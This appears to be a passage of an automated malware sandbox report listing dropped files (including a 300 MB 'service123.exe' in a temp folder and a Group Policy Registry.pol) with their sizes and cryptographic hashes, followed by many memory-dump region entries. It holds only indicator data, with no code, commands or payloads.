                                                                                                                          SHA256

                                                                                                                          743304691772b7f4b1254b7ec4defe408abd5380c260906ff5d51018cc51c7f4

                                                                                                                          SHA512

                                                                                                                          0b3219ff89bd5f80aa83682c6193c8f540058262231f343ab11ebccb7849cf45b1b2850494150522479735304cd255e4bc25c1bd76a42f7482e43a3f60d000ef

                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\Whom

                                                                                                                          Filesize

                                                                                                                          66KB

                                                                                                                          MD5

                                                                                                                          cf18a7ed11645523addbd2fbb31b014d

                                                                                                                          SHA1

                                                                                                                          09caf4ed6b6822e838d3512ce5a75e4125192c5f

                                                                                                                          SHA256

                                                                                                                          27dbf0e6f006ae0f7fa94cd33287e7f3ab85e1fa637636eff8e94eb649e45990

                                                                                                                          SHA512

                                                                                                                          f1cfc3fbaccfcd199b99ac647a2a0f76a05a7db1b655fa2e9de44def1630bebbfdbbd814225664f2d7d7015ff73b87c02242bec5105460459694f03e836f0d56

                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\Wireless

                                                                                                                          Filesize

                                                                                                                          63KB

                                                                                                                          MD5

                                                                                                                          df9a85af5771ea736a104b6e3eb86f0b

                                                                                                                          SHA1

                                                                                                                          319cb80eed888d089ab5b6944adbcbe89c3195eb

                                                                                                                          SHA256

                                                                                                                          cee5172f67cacbc90062c13713a08561b6984cb6c3c98663b7e541445b2fd492

                                                                                                                          SHA512

                                                                                                                          8e7aedbe38bedf9a0c167f778eb7678b6ad73f56e1f1196eaf771c01b8d6cd2a99ff015190efcf3f7e340979e501172d2d606e3e3b9ae53873ab9244aaf10eb9

                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_o3brum3u.lnv.ps1

                                                                                                                          Filesize

                                                                                                                          60B

                                                                                                                          MD5

                                                                                                                          d17fe0a3f47be24a6453e9ef58c94641

                                                                                                                          SHA1

                                                                                                                          6ab83620379fc69f80c0242105ddffd7d98d5d9d

                                                                                                                          SHA256

                                                                                                                          96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

                                                                                                                          SHA512

                                                                                                                          5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\service123.exe

                                                                                                                          Filesize

                                                                                                                          300.0MB

                                                                                                                          MD5

                                                                                                                          736e5c3ccbcb6b277e629a416e012aa8

                                                                                                                          SHA1

                                                                                                                          d2c6c17b623976c3314ebabb7f2704a1262785f3

                                                                                                                          SHA256

                                                                                                                          94d6549cb8f69e5d938ebe348ea82a2292ec8ee3a5b483e1e1699ab23e123a20

                                                                                                                          SHA512

                                                                                                                          4e9bd816651b471d9acf47220279bd9740811ea244ea848fb42e990822da0494c892343f9c430c2a91c2d0da6f3113ec8494917548f78e6098a4f9443fde80fe

                                                                                                                        • C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                                                                                          Filesize

                                                                                                                          15KB

                                                                                                                          MD5

                                                                                                                          e07701efc5dc59156c254ddf1e47c947

                                                                                                                          SHA1

                                                                                                                          5883be5db6d8aa14d5ddd2c4469edc478be4b486

                                                                                                                          SHA256

                                                                                                                          77e6236799ad4cd0330ee08c8e012d5454997663a7af24d73a2d36aef772bcc2

                                                                                                                          SHA512

                                                                                                                          4dbcab69f100b643b03015cb186c6ae8c49343fff4199f2a268a2d7056f3eb503226fcaabe0b7ca37c345fa1136da4442f3481c8b85547e430a801963e871fb4

                                                                                                                        • C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                                                                                          Filesize

                                                                                                                          11KB

                                                                                                                          MD5

                                                                                                                          c106cd2794e3875ef02a89b2458ca1c4

                                                                                                                          SHA1

                                                                                                                          e76142e7a82829e196eba56ae664b59b91d8f0f7

                                                                                                                          SHA256

                                                                                                                          3a10e2ac0e5624dc4d1a00d3904cadbb6903f11d4d54b43bd677a3ee3340f540

                                                                                                                          SHA512

                                                                                                                          91bf93c97ef228de1844a259bdfb5f4e4bcc83ec737c64c0d1319db99e2ee78cd5a86645cdca828e1badd9d5d10c8b84aa55ca18ec4e2840c7e5c3f2ed7e174d

                                                                                                                        • C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                                                                                          Filesize

                                                                                                                          11KB

                                                                                                                          MD5

                                                                                                                          44f209fa20be288abc9c99eb0c689516

                                                                                                                          SHA1

                                                                                                                          b8be942f3a989ad0a37866785e90dd3065656998

                                                                                                                          SHA256

                                                                                                                          a311331191b94fdb79fdc095bc6b1c6532617b317702705e06fa545e73354d04

                                                                                                                          SHA512

                                                                                                                          7d024d44ba1cf7d539ac5e4d98fdec2966a640ed9ee55adaf7c102aadd2c2ae8a6333c3e377783ebb4c15f04416600f8b2c9c8c3340d45312e3558dcba1fa58d

                                                                                                                        • C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                                                                                          Filesize

                                                                                                                          15KB

                                                                                                                          MD5

                                                                                                                          b1701b0d92aad9ba66acd498e5e649cc

                                                                                                                          SHA1

                                                                                                                          400759c10b7ab2201e90604ee9a6c43d921902a5

                                                                                                                          SHA256

                                                                                                                          a9c59a827cd7c1ce692fa2fb8367bb8eef87ae2959d1898ae38b1a9de27f900b

                                                                                                                          SHA512

                                                                                                                          c5aff8fa6ca098d47cc91940306754c219a32dc729ab954a0ad91f1d5356148f01520801bc13c5410b6dada1cfe4a2e8bb786dcb286e330e78d1f89b0bd9f8a7

                                                                                                                        • C:\Windows\system32\GroupPolicy\Machine\Registry.pol

                                                                                                                          Filesize

                                                                                                                          6KB

                                                                                                                          MD5

                                                                                                                          d97ae0ecc9b4ae8171dada5e12eb1ea3

                                                                                                                          SHA1

                                                                                                                          e95a8d003253c02998ff2efc8a42254dcce5feba

                                                                                                                          SHA256

                                                                                                                          da29fd68d7907f96cbad1b7dcb2fc6deb9feff8801c9fd6f2e17156f1464d17d

                                                                                                                          SHA512

                                                                                                                          f506cb180d1f8872adbbe47bbda2f797f685846ef1ff026d2343797d95280608aba1733f817cde299c512f4396b936bb4b7086fd65fbdb14e91f128d226c14fa

                                                                                                                        • memory/384-274-0x000000006EDE0000-0x000000006EF1C000-memory.dmp

                                                                                                                          Filesize

                                                                                                                          1.2MB

                                                                                                                        • memory/384-273-0x0000000000F50000-0x0000000000F61000-memory.dmp

                                                                                                                          Filesize

                                                                                                                          68KB

                                                                                                                        • memory/384-205-0x00000000069C0000-0x0000000006A0C000-memory.dmp

                                                                                                                          Filesize

                                                                                                                          304KB

                                                                                                                        • memory/384-202-0x00000000060C0000-0x0000000006414000-memory.dmp

                                                                                                                          Filesize

                                                                                                                          3.3MB

                                                                                                                        • memory/644-280-0x0000000000720000-0x0000000000DD1000-memory.dmp

                                                                                                                          Filesize

                                                                                                                          6.7MB

                                                                                                                        • memory/644-294-0x0000000010000000-0x0000000011E58000-memory.dmp

                                                                                                                          Filesize

                                                                                                                          30.3MB

                                                                                                                        • memory/644-340-0x0000000000720000-0x0000000000DD1000-memory.dmp

                                                                                                                          Filesize

                                                                                                                          6.7MB

                                                                                                                        • memory/772-252-0x0000000000720000-0x0000000000DD1000-memory.dmp

                                                                                                                          Filesize

                                                                                                                          6.7MB

                                                                                                                        • memory/772-147-0x0000000000720000-0x0000000000DD1000-memory.dmp

                                                                                                                          Filesize

                                                                                                                          6.7MB

                                                                                                                        • memory/772-188-0x0000000010000000-0x0000000011E58000-memory.dmp

                                                                                                                          Filesize

                                                                                                                          30.3MB

                                                                                                                        • memory/1104-356-0x0000000004840000-0x0000000004B94000-memory.dmp

                                                                                                                          Filesize

                                                                                                                          3.3MB

                                                                                                                        • memory/1520-91-0x00000000050B0000-0x0000000005121000-memory.dmp

                                                                                                                          Filesize

                                                                                                                          452KB

                                                                                                                        • memory/1520-44-0x00000000050B0000-0x0000000005121000-memory.dmp

                                                                                                                          Filesize

                                                                                                                          452KB

                                                                                                                        • memory/1520-39-0x00000000050B0000-0x0000000005121000-memory.dmp

                                                                                                                          Filesize

                                                                                                                          452KB

                                                                                                                        • memory/1520-40-0x00000000050B0000-0x0000000005121000-memory.dmp

                                                                                                                          Filesize

                                                                                                                          452KB

                                                                                                                        • memory/1520-41-0x00000000050B0000-0x0000000005121000-memory.dmp

                                                                                                                          Filesize

                                                                                                                          452KB

                                                                                                                        • memory/1520-42-0x00000000050B0000-0x0000000005121000-memory.dmp

                                                                                                                          Filesize

                                                                                                                          452KB

                                                                                                                        • memory/1520-214-0x00000000050B0000-0x0000000005121000-memory.dmp

                                                                                                                          Filesize

                                                                                                                          452KB

                                                                                                                        • memory/1520-223-0x00000000050B0000-0x0000000005121000-memory.dmp

                                                                                                                          Filesize

                                                                                                                          452KB

                                                                                                                        • memory/1520-43-0x00000000050B0000-0x0000000005121000-memory.dmp

                                                                                                                          Filesize

                                                                                                                          452KB

                                                                                                                        • memory/1520-241-0x00000000050B0000-0x0000000005121000-memory.dmp

                                                                                                                          Filesize

                                                                                                                          452KB

                                                                                                                        • memory/1520-250-0x00000000050B0000-0x0000000005121000-memory.dmp

                                                                                                                          Filesize

                                                                                                                          452KB

                                                                                                                        • memory/1520-156-0x00000000050B0000-0x0000000005121000-memory.dmp

                                                                                                                          Filesize

                                                                                                                          452KB

                                                                                                                        • memory/1520-46-0x00000000050B0000-0x0000000005121000-memory.dmp

                                                                                                                          Filesize

                                                                                                                          452KB

                                                                                                                        • memory/1520-64-0x00000000050B0000-0x0000000005121000-memory.dmp

                                                                                                                          Filesize

                                                                                                                          452KB

                                                                                                                        • memory/1520-162-0x00000000050B0000-0x0000000005121000-memory.dmp

                                                                                                                          Filesize

                                                                                                                          452KB

                                                                                                                        • memory/1520-71-0x00000000050B0000-0x0000000005121000-memory.dmp

                                                                                                                          Filesize

                                                                                                                          452KB

                                                                                                                        • memory/1520-81-0x00000000050B0000-0x0000000005121000-memory.dmp

                                                                                                                          Filesize

                                                                                                                          452KB

                                                                                                                        • memory/1520-102-0x00000000050B0000-0x0000000005121000-memory.dmp

                                                                                                                          Filesize

                                                                                                                          452KB

                                                                                                                        • memory/1520-110-0x00000000050B0000-0x0000000005121000-memory.dmp

                                                                                                                          Filesize

                                                                                                                          452KB

                                                                                                                        • memory/1520-122-0x00000000050B0000-0x0000000005121000-memory.dmp

                                                                                                                          Filesize

                                                                                                                          452KB

                                                                                                                        • memory/1520-131-0x00000000050B0000-0x0000000005121000-memory.dmp

                                                                                                                          Filesize

                                                                                                                          452KB

                                                                                                                        • memory/1764-290-0x0000000004480000-0x00000000047D4000-memory.dmp

                                                                                                                          Filesize

                                                                                                                          3.3MB

                                                                                                                        • memory/1764-291-0x0000000004F30000-0x0000000004F7C000-memory.dmp

                                                                                                                          Filesize

                                                                                                                          304KB

                                                                                                                        • memory/1820-253-0x0000000000DA0000-0x0000000000DB2000-memory.dmp

                                                                                                                          Filesize

                                                                                                                          72KB

                                                                                                                        • memory/1820-256-0x0000000005900000-0x000000000599C000-memory.dmp

                                                                                                                          Filesize

                                                                                                                          624KB

                                                                                                                        • memory/1980-267-0x0000000000F50000-0x0000000000F61000-memory.dmp

                                                                                                                          Filesize

                                                                                                                          68KB

                                                                                                                        • memory/1984-270-0x0000000000400000-0x0000000001064000-memory.dmp

                                                                                                                          Filesize

                                                                                                                          12.4MB

                                                                                                                        • memory/1984-204-0x0000000000400000-0x0000000001064000-memory.dmp

                                                                                                                          Filesize

                                                                                                                          12.4MB

                                                                                                                        • memory/1984-255-0x0000000000400000-0x0000000001064000-memory.dmp

                                                                                                                          Filesize

                                                                                                                          12.4MB

                                                                                                                        • memory/3304-418-0x00000000059B0000-0x00000000059FC000-memory.dmp

                                                                                                                          Filesize

                                                                                                                          304KB

                                                                                                                        • memory/3324-93-0x0000000000400000-0x0000000000673000-memory.dmp

                                                                                                                          Filesize

                                                                                                                          2.4MB

                                                                                                                        • memory/4180-259-0x0000000000400000-0x0000000000458000-memory.dmp

                                                                                                                          Filesize

                                                                                                                          352KB

                                                                                                                        • memory/4180-260-0x0000000000400000-0x0000000000458000-memory.dmp

                                                                                                                          Filesize

                                                                                                                          352KB

                                                                                                                        • memory/4528-330-0x000002AABE280000-0x000002AABE2A2000-memory.dmp

                                                                                                                          Filesize

                                                                                                                          136KB

                                                                                                                        • memory/4584-310-0x0000000005080000-0x00000000050CC000-memory.dmp

                                                                                                                          Filesize

                                                                                                                          304KB

                                                                                                                        • memory/4584-308-0x0000000004910000-0x0000000004C64000-memory.dmp

                                                                                                                          Filesize

                                                                                                                          3.3MB

                                                                                                                        • memory/4712-166-0x00000000057E0000-0x0000000005E08000-memory.dmp

                                                                                                                          Filesize

                                                                                                                          6.2MB

                                                                                                                        • memory/4712-185-0x0000000007CD0000-0x0000000008274000-memory.dmp

                                                                                                                          Filesize

                                                                                                                          5.6MB

                                                                                                                        • memory/4712-169-0x0000000006070000-0x00000000060D6000-memory.dmp

                                                                                                                          Filesize

                                                                                                                          408KB

                                                                                                                        • memory/4712-180-0x00000000066C0000-0x00000000066DE000-memory.dmp

                                                                                                                          Filesize

                                                                                                                          120KB

                                                                                                                        • memory/4712-165-0x0000000002E10000-0x0000000002E46000-memory.dmp

                                                                                                                          Filesize

                                                                                                                          216KB

                                                                                                                        • memory/4712-168-0x0000000006000000-0x0000000006066000-memory.dmp

                                                                                                                          Filesize

                                                                                                                          408KB

                                                                                                                        • memory/4712-182-0x0000000007680000-0x0000000007716000-memory.dmp

                                                                                                                          Filesize

                                                                                                                          600KB

                                                                                                                        • memory/4712-181-0x0000000006700000-0x000000000674C000-memory.dmp

                                                                                                                          Filesize

                                                                                                                          304KB

                                                                                                                        • memory/4712-184-0x0000000006C10000-0x0000000006C32000-memory.dmp

                                                                                                                          Filesize

                                                                                                                          136KB

                                                                                                                        • memory/4712-167-0x0000000005720000-0x0000000005742000-memory.dmp

                                                                                                                          Filesize

                                                                                                                          136KB

                                                                                                                        • memory/4712-179-0x00000000060E0000-0x0000000006434000-memory.dmp

                                                                                                                          Filesize

                                                                                                                          3.3MB

                                                                                                                        • memory/4712-183-0x0000000006BC0000-0x0000000006BDA000-memory.dmp

                                                                                                                          Filesize

                                                                                                                          104KB

                                                                                                                        • memory/4872-265-0x0000000000400000-0x0000000001069000-memory.dmp

                                                                                                                          Filesize

                                                                                                                          12.4MB

                                                                                                                        • memory/4872-138-0x0000000000400000-0x0000000001069000-memory.dmp

                                                                                                                          Filesize

                                                                                                                          12.4MB

                                                                                                                        • memory/4872-229-0x0000000000400000-0x0000000001069000-memory.dmp

                                                                                                                          Filesize

                                                                                                                          12.4MB

                                                                                                                        • memory/4988-377-0x00000000028E0000-0x0000000002965000-memory.dmp

                                                                                                                          Filesize

                                                                                                                          532KB

                                                                                                                        • memory/4988-429-0x0000000003130000-0x0000000003197000-memory.dmp

                                                                                                                          Filesize

                                                                                                                          412KB

                                                                                                                        • memory/4988-367-0x0000000010000000-0x0000000011E58000-memory.dmp

                                                                                                                          Filesize

                                                                                                                          30.3MB

                                                                                                                        • memory/4988-350-0x00000000004D0000-0x0000000000B81000-memory.dmp

                                                                                                                          Filesize

                                                                                                                          6.7MB

                                                                                                                        • memory/4988-755-0x00000000004D0000-0x0000000000B81000-memory.dmp

                                                                                                                          Filesize

                                                                                                                          6.7MB